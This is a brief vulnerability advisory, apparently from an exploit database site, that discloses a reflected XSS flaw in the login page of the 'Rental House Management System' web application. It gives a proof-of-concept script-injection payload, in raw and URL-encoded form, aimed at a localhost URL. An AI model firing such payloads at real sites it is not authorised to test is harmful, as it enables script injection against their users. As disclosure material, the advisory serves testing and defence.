Rental House Management System - Reflected Cross-Site Scripting (XSS)

2023.03.27
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Rental House Management System - Reflected Cross-Site Scripting (XSS) # Date: 25/03/2023 # Exploit Author: İsmail Can Durna # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/admin/rental_house_management_system.zip # Version: 1 # Tested on: Windows/Linux # Proof of Concept: # 1- Rental House Management System # 2- Go to http://localhost/rental_house/rental_house/login.php # 3- Add payload to the URL, the XSS Payload: /"><script>alert('XSS')</script> Url encoded: /%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E # 4- XSS has been triggered. # Go to this url "http://localhost/rental_house/rental_house/login.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E" XSS will trigger.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top